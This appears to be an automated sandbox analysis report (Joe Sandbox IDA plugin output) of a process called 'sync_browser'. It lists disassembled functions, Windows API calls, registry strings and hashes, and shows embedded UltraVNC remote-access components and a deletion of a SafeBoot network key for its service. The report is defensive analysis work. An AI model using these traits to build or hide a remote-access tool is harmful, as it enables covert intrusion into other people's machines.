Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: PrivateProfileWrite$SectionStringwsprintf
String ID: Permissions$isWritable
API String ID: 4007284473-46173998
Opcode ID: 7f12bc1f13081b37d87251f9c01b571011c2547fbcf2e5f3b1996aca624bc9e1
Instruction ID: 762d209c296fb580205cbcabe3406ea56b7dbb335b93664386e1d0a466e386ea
Opcode Fuzzy Hash: 7f12bc1f13081b37d87251f9c01b571011c2547fbcf2e5f3b1996aca624bc9e1
Instruction Fuzzy Hash: EE017C66F28A4792FA208B11F8511B5B324FFA9B58F841132F91D862A1EE2DE18DC700

Function 00007FF67E7C6D60 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FF67E7C6D93
RegQueryValueExA.ADVAPI32 ref: 00007FF67E7C6DD1
RegCloseKey.ADVAPI32 ref: 00007FF67E7C6DF0

Strings

System\WPA\MediaCenter, xrefs: 00007FF67E7C6D6E
Installed, xrefs: 00007FF67E7C6DBA

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: Installed$System\WPA\MediaCenter
API String ID: 3677997916-3461404619
Opcode ID: 554435a057f14dda37f7a57cb3d76111e403ad3072006c26abcf41054863a4ac
Instruction ID: 7cb7254e5d12558548dab2a36aae96b4e95d790e36c1f2a75c1e7740621972b9
Opcode Fuzzy Hash: 554435a057f14dda37f7a57cb3d76111e403ad3072006c26abcf41054863a4ac
Instruction Fuzzy Hash: EF016572A28B8186EB508F11F48475AB768FB94788F400231FA8D46BA8DF3CD148CB00

Function 00007FF67E7C6CC0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FF67E7C6CF3
RegQueryValueExA.ADVAPI32 ref: 00007FF67E7C6D35
RegCloseKey.ADVAPI32 ref: 00007FF67E7C6D54

Strings

System\CurrentControlSet\Control\Terminal Server, xrefs: 00007FF67E7C6CCE
TSAppCompat, xrefs: 00007FF67E7C6D16

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: System\CurrentControlSet\Control\Terminal Server$TSAppCompat
API String ID: 3677997916-252502655
Opcode ID: 04d61c28986da10210dbcfa3cf5e3dc0138d519c330a05b731dc0905639135b6
Instruction ID: 96608f923f22eb5780a137447c927af7232509fd7271b0a5f9d7f7a6db08f6c2
Opcode Fuzzy Hash: 04d61c28986da10210dbcfa3cf5e3dc0138d519c330a05b731dc0905639135b6
Instruction Fuzzy Hash: 6E016572A28B8286EF508B51F48475AB768FB94798F400131F68D46A68DF7CD158CF00

Function 00007FF67E7CA4C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FF67E7CA4E5
RegSetValueExA.ADVAPI32 ref: 00007FF67E7CA528
RegCloseKey.ADVAPI32 ref: 00007FF67E7CA533

Strings

Control Panel\Desktop, xrefs: 00007FF67E7CA4C9
WallpaperStyle, xrefs: 00007FF67E7CA521

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CloseOpenValue
String ID: Control Panel\Desktop$WallpaperStyle
API String ID: 779948276-747434185
Opcode ID: 86799752d3e54857d2eafa99cacc6ace5413f974bbce5436984941c6bb35b0a9
Instruction ID: 908bc1b2e037b6b32105da6a5507f2563bf718adbddce9fad7e2f1f51ef26235
Opcode Fuzzy Hash: 86799752d3e54857d2eafa99cacc6ace5413f974bbce5436984941c6bb35b0a9
Instruction Fuzzy Hash: E9016736B28A4182E7108B14F844556B3A4FB957A4F405331FA7D83BE8DF2DD509CB00

Function 00007FF67E7CA440 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FF67E7CA465
RegQueryValueExA.ADVAPI32 ref: 00007FF67E7CA49F
RegCloseKey.ADVAPI32 ref: 00007FF67E7CA4AA

Strings

Control Panel\Desktop, xrefs: 00007FF67E7CA449
WallpaperStyle, xrefs: 00007FF67E7CA479

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Desktop$WallpaperStyle
API String ID: 3677997916-747434185
Opcode ID: 8f2748f2ab4e4755b02a530358349d128b83dd3c8b3fdf60e15f7253ce60a2a6
Instruction ID: 252b710e8684d60eeaa7c3ecb79fab1bf1cab119c78c05f30c2633290be38b63
Opcode Fuzzy Hash: 8f2748f2ab4e4755b02a530358349d128b83dd3c8b3fdf60e15f7253ce60a2a6
Instruction Fuzzy Hash: DDF04436A18B4281EB108B14F454656B778FB95749F900231FA4D47B78DF3DD11ECB00

Function 00007FF67E7D3760 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 23registryCOMMON

Download Yara Rule

APIs

_snprintf.LIBCMT ref: 00007FF67E7D379D

Part of subcall function 00007FF67E87851C: _errno.LIBCMT ref: 00007FF67E878553
Part of subcall function 00007FF67E87851C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67E87855E

RegDeleteKeyA.ADVAPI32 ref: 00007FF67E7D37AE

Strings

SYSTEM\CurrentControlSet\Control\SafeBoot\%s\%s, xrefs: 00007FF67E7D3787
Network, xrefs: 00007FF67E7D3780
uvnc_service, xrefs: 00007FF67E7D3779

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Delete_errno_invalid_parameter_noinfo_snprintf
String ID: Network$SYSTEM\CurrentControlSet\Control\SafeBoot\%s\%s$uvnc_service
API String ID: 1597899911-1199838351
Opcode ID: 446da7c11d9b0ffc6a81d4342d0f74e20c69771809681aa75ea43c0afc302851
Instruction ID: ccebc45ead6d6feb1fc7f9a4e4e4f4a671980ca365e4de213215a6003e9c989d
Opcode Fuzzy Hash: 446da7c11d9b0ffc6a81d4342d0f74e20c69771809681aa75ea43c0afc302851
Instruction Fuzzy Hash: 1FF0B462B38E4281EA109720F4553AAA360FB94318FC01236F65D837E8CF3CD11DC744

Function 00007FF67E7F0B70 Relevance: 7.6, APIs: 5, Instructions: 107windowCOMMON

Download Yara Rule

APIs

SelectObject.GDI32 ref: 00007FF67E7F0BA4
BitBlt.GDI32 ref: 00007FF67E7F0CC1
SelectObject.GDI32 ref: 00007FF67E7F0CD3
GdiFlush.GDI32 ref: 00007FF67E7F0CE2
GdiFlush.GDI32 ref: 00007FF67E7F0D14

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: FlushObjectSelect
String ID:
API String ID: 2071645339-0
Opcode ID: aae6b1b2f4783f6f5e23d49270f9574a5a39ea57b095736f451dd763dd412b48
Instruction ID: cc1cbd496d44bbe54645920592211d0da111ec036ee64956e691f27a5852b453
Opcode Fuzzy Hash: aae6b1b2f4783f6f5e23d49270f9574a5a39ea57b095736f451dd763dd412b48
Instruction Fuzzy Hash: B8516F73A2C6818AF7609F25E4047AA7B90FB95B89F180136FA5D87755CE3CE44ACB00

Function 00007FF67E87CC70 Relevance: 7.6, APIs: 5, Instructions: 105COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF67E87CC96
_invalid_parameter_noinfo.LIBCMT ref: 00007FF67E87CCA1
_getptd.LIBCMT ref: 00007FF67E87CCAD
_lock.LIBCMT ref: 00007FF67E87CCE6
_lock.LIBCMT ref: 00007FF67E87CD79

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: _lock$_errno_getptd_invalid_parameter_noinfo
String ID:
API String ID: 2808128820-0
Opcode ID: 293906f060d6459fee2b9c3bdc37a31292350123b62cfc1943e27c937da36d0d
Instruction ID: 777debc2331435e82686b26d7309121d471ad8644dea6feec382281b8bb036e6
Opcode Fuzzy Hash: 293906f060d6459fee2b9c3bdc37a31292350123b62cfc1943e27c937da36d0d
Instruction Fuzzy Hash: 2E419A23B3964281FB15AB61A9003BAAA91FF69BD4F440235FD4DD77E6DF2DA409C700

Function 00007FF67E885D3C Relevance: 7.6, APIs: 5, Instructions: 102COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,?,?,?,00000010,00000008,?,00007FF67E885EF7), ref: 00007FF67E885D96
malloc.LIBCMT ref: 00007FF67E885DFA
MultiByteToWideChar.KERNEL32(?,?,?,?,00000010,00000008,?,00007FF67E885EF7), ref: 00007FF67E885E42
GetStringTypeW.KERNEL32(?,?,?,?,00000010,00000008,?,00007FF67E885EF7), ref: 00007FF67E885E59
free.LIBCMT ref: 00007FF67E885E6D

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$StringTypefreemalloc
String ID:
API String ID: 307345228-0
Opcode ID: 1b990316f8ee8c74eb84edbc338ace2982aad15001b0fddeae94aa45b172380f
Instruction ID: 1ec280410e9edc40b973e1a4c23a28fbbc63f67107582604c1f5816a988206bf
Opcode Fuzzy Hash: 1b990316f8ee8c74eb84edbc338ace2982aad15001b0fddeae94aa45b172380f
Instruction Fuzzy Hash: CE415F73A34A818AEB619F2598005A9A2D5FF64BA8F584735FE2D877D5DF3CE4098300

Function 00007FF67E7E9390 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 50COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF67E7E93C0

Part of subcall function 00007FF67E82CC40: shutdown.WS2_32 ref: 00007FF67E82CC70
Part of subcall function 00007FF67E82CC40: closesocket.WS2_32 ref: 00007FF67E82CC7A

Strings

vncclient.cpp : enable update thread, xrefs: 00007FF67E7E940B
c, xrefs: 00007FF67E7E93B5
vncclient.cpp : enable/disable synced, xrefs: 00007FF67E7E9448
vncclient.cpp : protocol enabled too many times!, xrefs: 00007FF67E7E93D1

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalEnterSectionclosesocketshutdown
String ID: c$vncclient.cpp : enable update thread$vncclient.cpp : enable/disable synced$vncclient.cpp : protocol enabled too many times!
API String ID: 3339156387-1190838069
Opcode ID: ef05844faa1cd020fc3eb9c414a04fab55e6cb55e3cee0b01a28a687e8f68859
Instruction ID: e83a2ed9e4e74618df5af38952e3b1d6e99e7799517877bf08848652f12ab178
Opcode Fuzzy Hash: ef05844faa1cd020fc3eb9c414a04fab55e6cb55e3cee0b01a28a687e8f68859
Instruction Fuzzy Hash: 7F214F63A28E8281E750DF29D8442F96369FBA8B94F544231E95EC72E5DF3CD549C310

Function 00007FF67E88A62C Relevance: 7.5, APIs: 5, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF67E88A663
GetCurrentProcessId.KERNEL32 ref: 00007FF67E88A66E
GetCurrentThreadId.KERNEL32 ref: 00007FF67E88A67A
GetTickCount.KERNEL32 ref: 00007FF67E88A686
QueryPerformanceCounter.KERNEL32 ref: 00007FF67E88A697

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 5fd10cac5a6f9bb249cac31feee61d70b85b460cd106259e4606b4f7c020a879
Instruction ID: 76c7427c0318a5ea4533835c74d56124482f0135262efe0cbc7d9964820b1c48
Opcode Fuzzy Hash: 5fd10cac5a6f9bb249cac31feee61d70b85b460cd106259e4606b4f7c020a879
Instruction Fuzzy Hash: D4016122B79A0182EB809F25F844265A364FB69B90F446630FE5E877E4DE3CD88D8300

Function 00007FF67E87B6F0 Relevance: 7.5, APIs: 5, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 00007FF67E87B6F9
_errno.LIBCMT ref: 00007FF67E87B701

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: __doserrno_errno
String ID:
API String ID: 921712934-0
Opcode ID: d406b4a9bfd038921951594095831198988d57d612f0112f0ddf710c3ea7d616
Instruction ID: 3abbf1d4bc4cd0b289ab9c07c353a863f4aa0469ed54f4c175030c83e1fcd85b
Opcode Fuzzy Hash: d406b4a9bfd038921951594095831198988d57d612f0112f0ddf710c3ea7d616
Instruction Fuzzy Hash: FC018163F3964646FA156BD5884137CA152AFB1BB2F514332F53D863E2CE6C6418C620

Function 00007FF67E7F08E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON

Download Yara Rule

APIs

LoadCursorA.USER32 ref: 00007FF67E7F0925

Part of subcall function 00007FF67E877978: malloc.LIBCMT ref: 00007FF67E877992

Part of subcall function 00007FF67E7ED930: InitializeCriticalSection.KERNEL32 ref: 00007FF67E7ED95E
Part of subcall function 00007FF67E7ED930: InitializeCriticalSection.KERNEL32 ref: 00007FF67E7ED9EB
Part of subcall function 00007FF67E7ED930: LoadLibraryA.KERNEL32 ref: 00007FF67E7EDA0D
Part of subcall function 00007FF67E7ED930: GetProcAddress.KERNEL32 ref: 00007FF67E7EDA30
Part of subcall function 00007FF67E7ED930: LoadLibraryA.KERNEL32 ref: 00007FF67E7EDA51
Part of subcall function 00007FF67E7ED930: GetProcAddress.KERNEL32 ref: 00007FF67E7EDA6D

Strings

vncDesktopSW.cpp : SWinit , xrefs: 00007FF67E7F09AF
vncdesktop.cpp : initialising desktop handler, xrefs: 00007FF67E7F08FF
vncdesktop.cpp : failed to start hook thread, xrefs: 00007FF67E7F0972

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Load$AddressCriticalInitializeLibraryProcSection$Cursormalloc
String ID: vncDesktopSW.cpp : SWinit $vncdesktop.cpp : failed to start hook thread$vncdesktop.cpp : initialising desktop handler
API String ID: 2513085289-3031267129
Opcode ID: 1873326b8f4cfb085588ecdcb6f02ef7e0e864c911988560d8123a10f1f5999c
